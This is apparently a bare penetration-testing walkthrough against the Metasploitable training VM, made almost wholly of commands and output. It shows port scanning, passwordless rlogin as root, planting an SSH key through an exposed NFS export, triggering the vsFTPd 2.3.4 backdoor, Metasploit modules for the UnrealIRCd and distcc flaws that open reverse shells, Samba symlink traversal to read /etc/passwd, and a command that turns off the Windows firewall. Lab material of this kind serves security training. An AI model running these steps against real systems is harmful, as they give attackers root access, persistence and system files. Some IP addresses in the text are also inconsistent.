

Sistemas vulnerables

msfadmin@metasploitable:~$ ifconfig



  

eth0 Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1 

inet addr:192.168.93.101  Bcast:192.168.99.255  Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1





nmap -p0-65535 192.168.93.101



Starting Nmap 5.61TEST4 ( http://nmap.org ) 

Nmap scan report for 192.168.93.101

Host is up (0.00028s latency).

Not shown: 65506 closed ports

PORT      STATE SERVICE

21/tcp    open  ftp

22/tcp    open  ssh

23/tcp    open  telnet

25/tcp    open  smtp

53/tcp    open  domain

80/tcp    open  http

111/tcp   open  rpcbind

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

512/tcp   open  exec

513/tcp   open  login

514/tcp   open  shell

1099/tcp  open  rmiregistry

1524/tcp  open  ingreslock

2049/tcp  open  nfs

2121/tcp  open  ccproxy-ftp

3306/tcp  open  mysql

3632/tcp  open  distccd

5432/tcp  open  postgresql

5900/tcp  open  vnc

6000/tcp  open  X11

6667/tcp  open  irc

6697/tcp  open  unknown

8009/tcp  open  ajp13

8180/tcp  open  unknown

8787/tcp  open  unknown

39292/tcp open  unknown

43729/tcp open  unknown

44813/tcp open  unknown

55852/tcp open  unknown

MAC Address: 00:0C:29:9A:52:C1 (VirtualBox)





# rlogin -l root 192.168.93.101

Last login: Fri Ago  1 00:10:39 EDT 2012 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#





root@ubuntu:~# rpcinfo -p 192.168.93.101

   program vers proto   port  service

    100000    2   tcp    111  portmapper

    100000    2   udp    111  portmapper

    100024    1   udp  53318  status

    100024    1   tcp  43729  status

    100003    2   udp   2049  nfs

    100003    3   udp   2049  nfs

    100003    4   udp   2049  nfs

    100021    1   udp  46696  nlockmgr

    100021    3   udp  46696  nlockmgr

    100021    4   udp  46696  nlockmgr

    100003    2   tcp   2049  nfs

    100003    3   tcp   2049  nfs

    100003    4   tcp   2049  nfs

    100021    1   tcp  55852  nlockmgr

    100021    3   tcp  55852  nlockmgr

    100021    4   tcp  55852  nlockmgr

    100005    1   udp  34887  mountd

    100005    1   tcp  39292  mountd

    100005    2   udp  34887  mountd

    100005    2   tcp  39292  mountd

    100005    3   udp  34887  mountd

    100005    3   tcp  39292  mountd



 

root@ubuntu:~# showmount -e 192.168.93.101

Export list for 192.168.93.101:





root@ubuntu:~# ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /root/.ssh/id_rsa.

Your public key has been saved in /root/.ssh/id_rsa.pub.

 

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

 

root@ubuntu:~# ssh root@192.168.93.101

Last login: Fri Ago  1 00:29:33 2012 from 192.168.93.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

root@metasploitable:~#





root@ubuntu:~# telnet 192.168.93.101 21

Trying 192.168.93.101...

Connected to 192.168.93.101.

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user usuario:)

331 Please specify the password.

pass invalid

^]

telnet> quit

Connection closed.

 

root@ubuntu:~# telnet 192.168.93.101 6200

Trying 192.168.93.101...

Connected to 192.168.93.101.

Escape character is '^]'.

id;

uid=0(root) gid=0(root)





msfconsole

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.93.101

msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.93.101:6667...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo 8bMUYsfmGvOLHBxe;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "8bMUYsfmGvOLHBxe\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.93.101:60257) at 2012-05-31 21:53:59 -0700

 

id

uid=0(root) gid=0(root)





msfconsole

msf > use exploit/unix/misc/distcc_exec

msf  exploit(distcc_exec) > set RHOST 192.168.93.101

msf  exploit(distcc_exec) > exploit

 

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo uk3UdiwLUq0LX3Bi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "uk3UdiwLUq0LX3Bi\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.93.101:38897) at 2012-05-31 22:06:03 -0700

 

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)







root@ubuntu:~# smbclient -L //192.168.93.101

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

        Sharename       Type      Comment

        ---------       ----      -------

        print$          Disk      Printer Drivers

        tmp             Disk      oh noes!

        opt             Disk     

        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

 

root@ubuntu:~# msfconsole

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.93.101

msf  auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf  auxiliary(samba_symlink_traversal) > exploit

 

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*]     \\192.168.93.101\tmp\rootfs\

 

msf  auxiliary(samba_symlink_traversal) > exit

 

root@ubuntu:~# smbclient //192.168.93.101/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]



$ netsh advfirewall set allprofiles state off





